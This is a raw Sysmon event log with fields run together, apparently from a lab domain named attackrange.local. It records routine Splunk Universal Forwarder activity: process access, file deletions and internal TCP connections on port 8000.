10341000x80000000000000001060685Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5132-6063-1101-00000000AF01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060684Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.065{7F8C56E7-5132-6063-1101-00000000AF01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245312Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:26.984{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9B8B1766BE9ADD9B1043F082888D0B,SHA256=12628B1C4A74C3720E2C4F605ECE1455657410858E3AA0198F42E30F7CE92D52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245311Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:26.203{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B85411FAE2DB7BE016DE22C46CC00A96,SHA256=BCBD0226FA1326BEE1D554BA3C4BA0CD8F7AE53095969E56CD06EEF1C8577DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245313Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:27.984{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8936909B8E09894C0980EB2891DC9299,SHA256=E2642CAB180B1781227A5D2981AFA5AEE75A51186656ECC6A586F1AA71672E6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060694Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.958{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54753-false10.0.1.12-8000- 23542300x80000000000000001060693Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:28.141{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A8E3D6ADC62039EF0BA588667DFFE3F,SHA256=22D892D699A0E7A36C08A04CE25BCED8F674DF72E6B79E3986687DA60924F07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060696Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:29.516{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B4ACF1F7AB548703C58AA8EAD88C0B3,SHA256=049572726BAB5D356C0A1C1D76DB30248797D1E2CBB0A4773F39F37D186DF3D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060695Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:29.516{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F203607C463088FE4E70CA0E6685317,SHA256=425D3F7727EF8349EF32A1F9423D9348BBB347F5BEBDC083D3729CE171F8F888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245314Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:29.031{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5255385D9243DA634F67B41A9944CD7E,SHA256=2213E830FA707C8389A6BAC4FE36B29E22E7FE1D1C8FB6677FAFD8A77A3FDC62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060697Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:30.876{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50D227251D36695F8733120C1B9E1F3,SHA256=325B00004376777905C361A26E446D83A67D31B7938B8111C26E0E4CE69255C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245317Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:29.632{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64741-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245316Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:30.281{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E04CE9D67B80B58E9018264831050C48,SHA256=0052C2619566EEE883DFDF1C076A47A75F51E059CB4142CEA551C878BCC8B16B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245315Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:30.047{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB355B8E9BB3AA40E0F892F8578483F8,SHA256=5D97018ABDB7021D558B3E300FD31832D4CC44CD90F47CF97CA1C093D7494ED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245318Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:31.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB7A4F586EBF2F310464D803D78F71B,SHA256=45EAB5724A4B88DB237EE50FD7905DBC669A233B81531796AA9C2F9D882CE106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060698Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:32.235{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB33D41733F1FD65FEF5143975D5A81C,SHA256=A0CABC5972A3CAD8EDF15C6243AC306ADFE844FA9806F6E0CE0E28CE414797A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245319Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:32.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1430FB16471E3C2B3A89FE0428DCB51,SHA256=8BAC7AAF046C58EAE282A3551CBADE5E3474A6046F8D36EEE773BFFCDCDF9F76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060699Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:33.595{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622364644990D63AAFADC3854A6493B6,SHA256=39C489C6595EEF969B85FC7261B8B4E43422C968CAD146292C0A6BFB9554BFEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245320Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:33.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D2B42476667B2659FE4504D11689BE,SHA256=08A8555924CA4A91C23576D92D327DA70F8CC4CBFC0305AA5D80EB5FDE5A25AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060701Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:34.955{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0688FAE0533E0F6B5C5E76CACAEFBE,SHA256=4FD99A0BD04E550A5BDE5ED6E78C7F874749B44BF5FA936FBD0949025B922BC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060700Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:31.958{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54754-false10.0.1.12-8000- 23542300x8000000000000000245321Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:34.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34C93D2561A3CE0D3FC14098BA0BDE3C,SHA256=CC632BBAF3A388396DAB8362049EA758A14E53AA0A730DF8A8546FBFF73FBF56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245322Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:35.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B287EE595AAB721F52C8F6C98EC3DBFB,SHA256=017699F6769D78CE606B745F87BAB37F39EE45400909450D94C0C08C3A03E2DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060702Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:36.314{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC65D948D1B7F4E2BF2C89628FBD5F4A,SHA256=22D9A5D54AA32527DDA286482057EF4BC87602F0C78DA165C298035F5C0955F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245326Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:35.648{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64742-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245325Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:36.359{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C759FA9235C098DDBDB646F80923455,SHA256=4D91E149A1763200605971283D1F0988F493E813B1DE67634F9376A9A2B8DEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245324Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:36.359{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B84D3E9640B720A2867177B96C30E3A2,SHA256=2AB98DD9CD73635A32F149044EC4AADCE7BB7EB805A467745E139037A9734155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245323Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:36.109{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9ED3667C34723B6368AF4780F833C18,SHA256=1056037615E06A1E605C46FC61E1799D8560F227D2B87236FEEDFEB6019A9E3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060703Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:37.674{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E73A44A1C0A2239B3A32E62209E4864,SHA256=7BCAFD4560FE58B3858F562134DBD92982F81BB6D5DD15D2E1FBDB66E3B7D87B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245327Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:37.140{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92BD908948A5DAC31174C66B9D4FB72,SHA256=93146808D991C1DC4427E3D1F7C36797F5FF529EA311CC4DCF6538D68E7B52F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245328Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:38.187{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=808B287FEE7789F449B14F07EFC99B64,SHA256=E4BF3EE29787400256188ADE3CE83BCA2DDC37C793F2A27F6E97E5BF26EA0C63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060704Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:37.083{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54755-false10.0.1.12-8000- 23542300x8000000000000000245329Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:39.218{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F4A40F60DCE54FA6BDBF86D8121553,SHA256=B5430A6510526B31D08623ECF64891F0A1BB27F43DE8863FCFCF365EF312082C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060706Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:40.362{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AFA4D64D95247174A7CB283C3F0800D,SHA256=FB03D3CA5968C36776F783C8804F2BD3AE7357E7B37F58A4F6359E5F1D811C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060705Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:40.362{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0771C220683227657316D5EE0D4E1065,SHA256=87BE16DCFB946A9C3AEEF06A0C3595F5562115643D130A43491BBA7712CE3620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245330Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:40.250{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198650EA49D55B9333BE23753E5E0DBC,SHA256=EF8BEA2DB43FC511D8A2116F3BED101F4555928CDFD7288B7E3FA49456E825F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060707Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:41.362{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D1D5D26B6E4196F2CB34ED21AFB4E4,SHA256=54EE66E9B1D54878A4ACE43F9BFDD8079A9FBD656FE6DD1E26CC787B10290124,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245333Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:40.664{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64743-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245332Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:41.312{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C759FA9235C098DDBDB646F80923455,SHA256=4D91E149A1763200605971283D1F0988F493E813B1DE67634F9376A9A2B8DEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245331Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:41.265{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C899E87C3BBB0A99F07146BB95CF8BD2,SHA256=2C2878EF78E8CE8D8C718481129524F4CE1B5C60535F05EDF41A230169B51B83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060708Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:42.362{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5ADA170D0F40002003342FB587A22E,SHA256=8997CEBD7066245A732282B53662BB05E06E474E8E7D923DC119A1DA0609486F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245334Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:42.265{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63403DBD4F9FF2F7D1FC40D9F86E716,SHA256=354E984E27E16419A9BF85EB7F6A1534417109B0A6C7DC233C83D40056CD83DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060709Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:43.456{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29D1347FAAD8F5AA5874F32391901EE,SHA256=3AF86AD8342B92A0B0A94324D82493019E63A2DEE8A6130991FD2FA0B7223E58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245335Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:43.265{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6621CA321856BE69EDC0179A961A4A2,SHA256=E6C2DCBF87A1D94C9D1267D4062662587E5155FFC10BB8B68CDDE3741EFCCBF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060710Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:44.815{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B75615F6F06AD995F39CA0EE7C1D566A,SHA256=8C8FBE49DF833E06FA892CDAD0CAF6626A07B98FD688B600E313F888102E5BAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245336Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:44.312{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1882C69F07CCB35E577D4066DACB4ED,SHA256=E03CF3E4A54F9D2BE382384084738153F228ABEF582C44E6011C4436477D7426,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060711Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:43.005{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54756-false10.0.1.12-8000- 23542300x8000000000000000245337Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:45.312{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02677E8EFC436A78567CA482A0E4623C,SHA256=07F2BC34EEB56A950F5635575DEB72C77A6A4A437CAEA95D7DAE475A6CE1F0A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060712Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:46.190{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB82F07F26DC1E9BFA088632A1C5AB7,SHA256=7FA17B63E8E50D64C386F51832CD5DD06A15452BF554B9E0B90841243B6A38B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245341Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:45.664{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64744-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 